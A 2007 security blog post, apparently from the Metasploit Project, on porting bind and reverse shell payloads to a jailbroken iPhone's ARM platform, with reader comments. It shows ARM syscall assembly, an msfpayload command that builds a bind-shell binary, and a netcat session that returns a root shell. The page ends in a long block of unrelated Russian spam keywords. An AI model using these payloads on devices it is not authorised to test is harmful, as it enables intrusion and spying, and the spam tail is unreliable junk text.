shell

Metasploit: A root shell in my pocket (and maybe yours) @import url("http://www.blogger.com/css/blog_controls.css"); @import url("http://www.blogger.com/dyn-css/authorization.css?targetBlogID=25010298"); /* ----------------------------------------------- Blogger Template Style Name: Minima Black Designer: Douglas Bowman URL: www.stopdesign.com Date: 26 Feb 2004 ----------------------------------------------- */ pre { white-space: pre-wrap; /* css-3 */ white-space: -moz-pre-wrap !important; /* Mozilla, since 1999 */ white-space: -pre-wrap; /* Opera 4-6 */ white-space: -o-pre-wrap; /* Opera 7 */ word-wrap: break-word; /* Internet Explorer 5.5+ */ } body { background:#000; margin:0; padding:40px 20px; font:x-small "Trebuchet MS",Trebuchet,Verdana,Sans-Serif; text-align:center; color:#ccc; font-size/* */:/**/small; font-size: /**/small; } a:link { color:#9ad; text-decoration:none; } a:visited { color:#a7a; text-decoration:none; } a:hover { color:#ad9; text-decoration:underline; } a img { border-width:0; } /* Header ----------------------------------------------- */ @media all { #header { width:660px; margin:0 auto 10px; } } @media handheld { #header { width:90%; } } #blog-title { font-size:200%; color:#ccc; text-transform:uppercase; letter-spacing:.2em; } #blog-title a { color:#ccc; text-decoration:none; } #blog-title a:hover { color:#ad9; } #description { margin:0 5px 5px; padding:0 20px 20px; font:78%/1.4em "Trebuchet MS",Trebuchet,Arial,Verdana,Sans-serif; text-transform:uppercase; letter-spacing:.2em; color:#777; } /* Content ----------------------------------------------- */ @media all { #content { width:660px; margin:0 auto; padding:0; text-align:left; } #main { width:410px; float:left; } #sidebar { width:220px; float:right; } } @media handheld { #content { width:90%; } #main { width:100%; float:none; } #sidebar { width:100%; float:none; } } /* Headings ----------------------------------------------- */ h2 { margin:1.5em 0 .75em; font:bold 78%/1.4em "Trebuchet MS",Trebuchet,Arial,Verdana,Sans-serif; text-transform:uppercase; letter-spacing:.2em; color:#777; } /* Posts ----------------------------------------------- */ @media all { .date-header { margin:1.5em 0 .5em; } .post { margin:.5em 0 1.5em; border-bottom:1px dotted #444; padding-bottom:1.5em; } } @media handheld { .date-header { padding:0 1.5em 0 1.5em; } .post { padding:0 1.5em 0 1.5em; } } .post-title { margin:.25em 0 0; padding:0 0 4px; font-size:140%; line-height:1.4em; color:#ad9; } .post-title a { text-decoration:none; color:#ad9; } .post-title a:hover { color:#fff; } .post div { margin:0 0 .75em; line-height:1.6em; } p.post-footer { margin:-.25em 0 0; color:#333; } .post-footer em, .comment-link { font:78%/1.4em "Trebuchet MS",Trebuchet,Arial,Verdana,Sans-serif; text-transform:uppercase; letter-spacing:.1em; } .post-footer em { font-style:normal; color:#777; margin-right:.6em; } .comment-link { margin-left:.6em; } .post img { padding:4px; border:1px solid #222; } .post blockquote { margin:1em 20px; } .post blockquote p { margin:.75em 0; } /* Comments ----------------------------------------------- */ #comments h4 { margin:1em 0; font:bold 78%/1.6em "Trebuchet MS",Trebuchet,Arial,Verdana,Sans-serif; text-transform:uppercase; letter-spacing:.2em; color:#999; } #comments h4 strong { font-size:130%; } #comments-block { margin:1em 0 1.5em; line-height:1.6em; } #comments-block dt { margin:.5em 0; } #comments-block dd { margin:.25em 0 0; } #comments-block dd.comment-timestamp { margin:-.25em 0 2em; font:78%/1.4em "Trebuchet MS",Trebuchet,Arial,Verdana,Sans-serif; text-transform:uppercase; letter-spacing:.1em; } #comments-block dd p { margin:0 0 .75em; } .deleted-comment { font-style:italic; color:gray; } /* Sidebar Content ----------------------------------------------- */ #sidebar ul { margin:0 0 1.5em; padding:0 0 1.5em; border-bottom:1px dotted #444; list-style:none; } #sidebar li { margin:0; padding:0 0 .25em 15px; text-indent:-15px; line-height:1.5em; } #sidebar p { color:#999; line-height:1.5em; } /* Profile ----------------------------------------------- */ #profile-container { margin:0 0 1.5em; border-bottom:1px dotted #444; padding-bottom:1.5em; } .profile-datablock { margin:.5em 0 .5em; } .profile-img { display:inline; } .profile-img img { float:left; padding:4px; border:1px solid #222; margin:0 8px 3px 0; } .profile-data { margin:0; font:bold 78%/1.6em "Trebuchet MS",Trebuchet,Arial,Verdana,Sans-serif; text-transform:uppercase; letter-spacing:.1em; } .profile-data strong { display:none; } .profile-textblock { margin:0 0 .5em; } .profile-link { margin:0; font:78%/1.4em "Trebuchet MS",Trebuchet,Arial,Verdana,Sans-serif; text-transform:uppercase; letter-spacing:.1em; } /* Footer ----------------------------------------------- */ #footer { width:660px; clear:both; margin:0 auto; } #footer hr { display:none; } #footer p { margin:0; padding-top:15px; font:78%/1.6em "Trebuchet MS",Trebuchet,Verdana,Sans-serif; text-transform:uppercase; letter-spacing:.1em; } #b-navbar { height:0px; visibility:hidden; display:none } #navbar-iframe { height:0px; visibility:hidden; display:none } @import url(http://www.blogger.com/css/navbar/classic.css); div.b-mobile {display:none;} Official blog of the Metasploit Project Tuesday, September 25, 2007 A root shell in my pocket (and maybe yours) After the recent price drop and toolchain release, I bit the bullet and bought a shiny new iPhone. The first thing I did is bypass activation, run jailbreak, and install the AppTapp Installer. Using the installer, I added OpenSSH and a VT-100 Terminal to the phone. Once I had shell access, I made a few observations:1) The processor is actually decent. Compare the iPhone (400Mhz*) with the Nokia n770 (233mhz) or the Nokia n800 (320Mhz) and the choice of a handheld hacking device is a no-brainer. The (mostly) working toolchain, large amounts of storage (8Gb), and ease of use make this a great candidate for almost any security researcher "on-the-go". If you tweak the networking preferences file, you can set the signal quality limit down to "1", turning the "join a WiFi network" screen into a primitive stumbler (or just install Stumbler via AppTapp). * The media widely reported the processor speed as 620Mhz and I repeated it here. Dan Moniz suggested I check the output of ioreg for the actual CPU speed, which is reported as 400Mhz (0084d717 == 0x17d78400 == 400000000). 2) EDGE network access is horribly slow, but it works. The downside is that the EDGE network provides the phone with a private address, on a point-to-point link, that is three hops away from a public IP range. For example, my phone's EDGE address is 10.x.x.x, its first hop is 172.16.x.x, its second hop is 10.x.x.x, and its third hop is also 10.x.x.x. The fourth hop is a 200.x.x.x address. Latency is between 180ms and 600ms, but averages around 200ms-250ms. I made a few attempts to discover other hosts in the private address space, in hopes of finding other EDGE devices, but instead only found a few scattered routers, switches, and servers.The phone has been a fun time sink. I used the MobileSafari PDF viewer to read all of the recent Uninformed Journal articles. Metasploit 2 runs decently, even though the Terminal isn't the best interface for a screen of this size. Metasploit 3 should run, as soon as the toolchain is capable of building a working Ruby interpreter (yes, there is a Ruby package in AppTapp, yes its totally broken). When that day comes, I hope the EDGE network can handle it :-)Having a network-enabled root shell in my pocket is great, but being able to pop a root shell on someone else's iPhone is even better. A few things to keep in mind:1) Every process runs as root. MobileSafari, MobileMail, even the Calculator, all run with full root privileges. Any security flaw in any iPhone application can lead to a complete system compromise. A rootkit takes on a whole new meaning when the attacker has access to the camera, microphone, contact list, and phone hardware. Couple this with "always-on" internet access over EDGE and you have a perfect spying device.2) The mDNSResponder service runs by default. This service is also known by the names Bonjour, ZeroConf, and Rendezvous. When the iPhone is first sync'ed with iTunes, the hostname is changed. The default hostname becomes "User's iPhone", where "User" is Mac OS X user account used to perform the sync. If the iPhone is connected to a WiFi network, the mDNS service will advertise itself on the local network, exposing the user name of the iPhone's owner. So far, it doesn't look like the mDNS service responds to normal probes, so at least active discovery is less likely (maybe the sysctl parameter net.inet.udp.no_5353=1 has something to do with it).3) The MobileMail application supports Microsoft Office document formats. It does this by using the OfficeImporter framework to convert these documents into a viewable form. This looks like a great target for file-format fuzzing and some late night reverse engineering. 4) Independent Security Evaluators demonstrated a code-execution vulnerability in the iPhone at Black Hat 2007. Their slides describe the exploit and shellcode development process. Since then, the toolchain and amount of public information has improved considerably. The first step to iPhone exploits is platform support for the Metasploit Framework. To support a new platform, the architecture must be defined in rex/constants.rb. I added two new architectures, one for ARM little endian (armle), and another for ARM big endian (armbe), since many ARM chips can run in either mode. The next step is figure out the payloads. Fortunately, I wrote many of Metasploit's PowerPC modules for Mac OS X. The iPhone uses the same syscall numbers, so porting payloads is straightforward. On Mac OS X PowerPC, the system call number is placed into r0 and the arguments start at register r3. On the iPhone, the system call number is placed into r12 and the arguments start at r0. For example, the "exit" system call on PowerPC looks like: li r0, 1 ; SYS_exit li r3, 255 ; Exit code 255 sc ; System callBy comparison, the same code on the iPhone looks like: mov r12, #1 ; SYS_exit mov r0, #255 ; Exit code 255 swi 128 ; System call With only a few headaches, I was able to port the bind shell and reverse shell payloads to the iPhone. I added a very simple nop generator to match. At this point, its possible to generate working iPhone shellcode using the trunk version of Metasploit 3. For kicks, I rewrote Charlie Millers's "vibrate" shellcode (listed in the ISE slides) as well. The Metasploit version is a little bit smaller and uses the correct address for Firmware 1.02. The next step is finish my XOR (well, EOR on ARM) encoder, and start playing with thumb mode (16 bit instructions). Since shellcode is no fun unless you can do something with it, I added support for iPhone executables to the msfpayload command. This allows you to generate stand-alone bind/reverse shell executables using the following syntax: $ msfpayload osx/armle/shell_bind_tcp LPORT=4444 X > iphone_bindshell.binThis binary can be copied to the iPhone using SSH or iPHUC/iPhoneTool and executed.$ ssh root@192.168.0.125# chmod +x iphone_bindshell.bin# ./iphone_bindshell.bin---$ nc -vvn 192.168.0.125 4444(UNKNOWN) [192.168.0.125] 4444 (krb524) openiduid=0 euid=1 gid=0(wheel) groups=0(wheel)uname -aDarwin Metasploit Developer's iPhone 9.0.0d1 Darwin Kernel Version 9.0.0d1: Fri Jun 22 00:38:56 PDT 2007; root:xnu-933.0.1.178.obj~1/RELEASE_ARM_S5L8900XRB iPhone1,1 DarwinOnce the XOR encoder is done, the only step left is to find the bugs and write the exploits :-) posted by hdm at 8:28 PM 15 Comments: Anonymous said... Nice One :) 7:38:00 AM mokum von Amsterdam said... Darn smart!You're contribution will surely help the iPhone dev-team and who knows, even inspire some other smarties to assist in the hunting.Thanks! 11:32:00 AM Anonymous said... you f^cking Rock!!! cant wait to see the versions develope. 2:45:00 PM Anonymous said... hd, got to say it: metasploit rocksjust curious why you were not part of the new syngress metasploit book. do you have something coming out book wise, or is that what the documentation is for? ;)good stuff 3:08:00 AM hdm said... Regarding the Syngress book on Metasploit -- we chose not to be part of the project for quite a few reasons. The biggest one is the fact that Metasploit was (and is) a moving target. Syngress wanted to start writing the book while we were transitioning between 2.7 and 3.0. The book they released this week has over half of its content dedicated to an obsolete version of the Framework. Personally, I am not a fan of Syngress's style, quality, editing skills, or marketing abilities. We DO have a community book that is in the works and any help you want to provide would be useful:http://en.wikibooks.org/wiki/Metasploit 7:00:00 AM n800_User said... Actually, n800 is a hacker's choice :)Of course 330MHz is smaller than 400.Actually in n800 there is way to use 400 too BUT then second DSP core should be down-clocked, sort of trade-off.But 330 MHz are pretty enough to have bunch of fun. What n800 can do?- The screen is 800x480.A way better for the web.And for entering text to the terminals :)- EDGE\3G goes via external device and can be a way better than EDGE.- Wi-Fi is both fast and consumes very small power in idle mode while keeping link alive.- Great bluetooth connectivity.Low powered as well and yes, it copes with dozens of connections easily.- Dozen of tools are ported.Like nmap, kismet, aircrack, curl\wget, ... and much more.Due to official SDK which making porting just a joke:)- You can even wardrive using gpsd to learn what and where.- There is openvpn to get to anywhere.No matter you're using EDGE and lame local IP, etc.- There is even nginx and php-fastcgi so your server is with you :)- Bluetooth utils to ... er... to audit these remote devices :)- Real mc filemanager, sshing to your pocket and dealing with files on device and it's cards is a real fun.- TCPDump allows to know what's going up.- Some GUI fun.On n800 you can run full-featured Liunx apps.Like mplayer to watch let's say .FLV file.Or Pidgin to chat via ICQ,MSN,Jabber.Or maybe xchat to hang on IRC.Or MaemoMapper to navigate via maps like google streets optionally using GPS reciever.Some VNC and RemoteDesktop fun as well.You're ruling your world :-).Decent VoIP features.Including SIP (a whole dozen of operators like Gizmo) and Skype.MythTV is also here.And well, it runs Firefox.To be exact, reduced version of great browser based on Gecko 1.9.Yes, this Gecko is beta which will be used by Firefox 3, but even today it can easily beat any other pocket browser just jokingly (on Ajax-based sites, or YouTube, he-he).- We can mess with our OS as we wish.If we want to, we can rebuild kernel and other parts like initfs.Allowing device to boot up from cards, have unusual kernel features not available out of the box (like various filesystems support added, or advanced SDHC patches for fast speeds, or whatever else kernel does).What n800 can not? - It can't be cell phone.Yes.Kinda unique for Nokia.But in exchange you're getting FREEDOM.Device is not locked to any carrier.No strings attached.No restrictions.Nothing crippled.Real Debian linux inside.You can even apt-get something instead of using app manager, result is same :-).You're getting real unrestricted pocket computer from beginning.iPhone is just a dialer and player by design.So you're hacking to take your rights and Apple can always stop you with updates.We're using our rights.Nokia will not stop us.Because their device created to be FREE and give you some FREEDOM.- Yes, n800 can not limit you as well.It's perfectly hackable.You do not have to fight with dumb barriers.You do not have to afraid updates.Just have fun :-)- And yes, n800 can't be such buzzword.It rather intended for thinking people while iPhone is dumb dialer with player targeted on dumb people by design (so it is a way more restrictive without hacking).Of course you can break'n'enter.But Apple may decide to prevent "homebrew" apps with updates.So this way can be just headache.As for me, looks like some people are not seeking simple way but rather their own.That's good, too.ARM shellcode... users should tremble since there is so much ARM devices today =).Great work!Did I mentioned ARM asm rocks compared to x86 one? ;) 3:57:00 PM Anonymous said... Amazing job HDM.Having a network-based root shell in my pocket does feel good, especially after reading your blog. 5:05:00 AM Matthew said... its people like you who fuck it up for the rest of us....get a life beyond trying endlessly to hack into other peoples phones... hey, there is a knock on the door, mom wants her basement back and she wants you to join the human world. Anarchy is a pain in the ass, you asswipe.if you have any ego, you will answer to this rather than delete..which i assume you will.. 10:20:00 AM hdm said... Matthew, its people like you who make this all worthwhile :-) 12:01:00 PM Anonymous said... as ceo of apple...i would hire you instantly:) 3:10:00 PM rd said... nice work bro :)I agree with n800_User tho .. n800 is a better choice for a handheld hacking device. 3:48:00 AM Anonymous said... i have been thinking about getting an n800 or maybe the n810, or maybe the Asus Eee - but I am coming from my trustworthy zaurus sl-5500 that I have had many years. My problem is, the zaurus is old and maybe a little slower, but it does everything I want it to do with auditing/pen testing....I did get metasploit up to 2.7 to work on it, but could never get 3 to work - lots of info on it at edwiget.name if anyone finds this useful. I never could find any gps + cable or 10/100 ethernet card for it...but wireless works great. I love the zaurus so much, I would love to trick it out with all its options and then just put it away....so if anyone has any stuff for it...contact me. 12:20:00 AM Adam said... Matthew, did you just throw insults at the legendary HDM? I don't think you even realize what you've just done.Its actually quite the opposite, its better a credible person such as HD finds this stuff out so something can be done about it rather than the people who really want to do damage.. 3:46:00 PM M@DL0G!K said... Matthew: ignorance is not safe. Computers are by design flawed... they need to know what to run. And there will always be people that wants/needs to know what's going on under the hood. And thank God, else you would throw away anything that stops working! And what about making something work better / make it more capable... well if it can be done, (like jailbreaking the ipod touch/iphone) then IT SHOULD BE DONE! (ie: Apple, as soon as you heared of installer.app, you should have bought them big time and provided the solution... but that's not getting money in, so f*ck it! .... .... .... ... money... ... yeah .. ) ... enough said about that!HD: great article! I need to know something: you talk about modifying the "network preference file" to allow for weaker networks to pop up .. humm .. do you mind doing a tutorial on that ? I couldnt find this info on google ! Thanks! -Madlogik 2:29:00 PM Anonymous coward said... /private/var/preferences/SystemConfiguration/com.apple.wifi.plist 3:32:00 AM Post a Comment Links to this post: See links to this post posted by @ Create a Link << Home Blogs Halvar Flake Matasano Chargen nCircle Team Arbor Networks Technocrat RISE Security Previous Posts An easier way to create payload modules in 3.0 The Pwnie Awards: Winners Announced! Black Hat USA: Tactical Exploitation The Pwnie Awards: Nominate your favorites today! April Codings Bring May Pwnings HeapLib support added to Metasploit 3 Exploiting the ANI vulnerability on Vista Metasploit Framework 3.0 RELEASED! Update on the status of 3.0 Kernel-mode payloads in Metasploit 3.0 разделы здание лмк катетер перегородка сантехкабин вызов водитель snr roulements планирование день дермато-венеролог купить элеваторный узел зеркало багуа клеить 88 люкс доставка окон интеллектуальный электросчетчик сборщик долг купить раструб выборочный лак купить яйцеварку квн позитивный психология проект электропроводка ванна моечный зона ограничение доступ мэш сервер hp зал аэробика кулер комп антенна радиочастотный сбор д/полоскания горло зубной боль очки защитный педагогика психология купить ломтерезку внешний антенна экг сервис зубной протез помидор купля dect desktop ножной пластырь силуэт слимент лифт портативный радиостанция рак кишка договор суррогатный мать гуп ритуал фарфор подшипниковый узел pki флеш презентация теплогенераторы master эмжс система дымоудаления аэробика sharp ar-5415 тач-скрин монитор ваттметр государственный герб эфирный антенна locus гелусил лак купить блендер шумок дмитрий владимирович купить хлебопечку перевод итальянский аппарат фигурный нарезка тест охота создание лого мачта флагшток купить пк бензопила stihl подшипниковый узел утюг культура танго программа шифрование авиа отправка li-da выставочный витрина высокотемпературный электроизоляция роль ставень госпиталь мэш геомаш-центр измеритель петля фаза нуль стеклянный перегородка tag heuer диспорт медикаметозное безоперационное прерывание беременность фосфорицирующая краска купить tomb raider рукавичка доставка электрокотел скрипт рассылка объвлений производственный тара холодильник оптом o2 optix мужчина выходной зеркало babyliss велюкс решетка оцинкованный вилатерм гуп ритуал дезинфекция белье купить электроэнцефалограф мустанг лазер купить fifa 2006 растворитель 646 авиа отправка герб рф швейцария культура передвижной сварочный агрегат портативный радиостанция маска косметический фарфор portofino ваза 2114 медикаментозный прерывание беременность внешний антенна ивановец ваза 21102 промышленый альпинизм калибровка цвет луковичный цвет автоподъемник аэробика сушильный машина asko билет цдкж купить угольник перех красный площадь собор снегоход буран лакокраска dect desktop телефонный обзвон надпись кружок холодильник либхер купить ножовка кулер тихий красный площадь васильевский спуск мелованный бумага креатин близорукость жаростойкий краска международный конкурс купить ниппель перех ивановец эфирный антенна locus компания сент-люсии два цвет охота гончий sharp ar-m205 купить каболка выделение кислорода девелоперская компания 100 девчонка одна лифт токовый клещ вышивка флаг ваттметр люминисцентная краска shell